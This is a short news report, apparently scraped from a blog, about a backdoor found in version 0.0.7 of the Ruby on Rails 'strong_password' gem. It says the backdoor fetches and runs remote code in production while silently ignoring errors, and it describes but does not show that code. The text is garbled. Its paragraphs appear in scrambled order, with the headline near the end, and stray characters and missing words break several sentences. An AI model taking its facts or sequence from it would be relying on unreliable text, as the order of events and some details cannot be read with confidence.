Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:įetches and runs the code stored in a, only if running in production, with an empty exception handling that ignores any error it may raise. The previous GitHub version had been updated in October 2018. When he looked at the strong_password gem on, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019. The discovery came about after Epion Health developer, Tute Costa, noticed something unusual when carefully updating a family of libraries used by his company’s dev to fix bugs and security vulnerabilities. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have used the default library, strong_password, in its infected version 0.0.7. Backdoor discovered in Ruby strong_password libraryĪn eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.Ī close shave, then.
0 Comments
Leave a Reply. |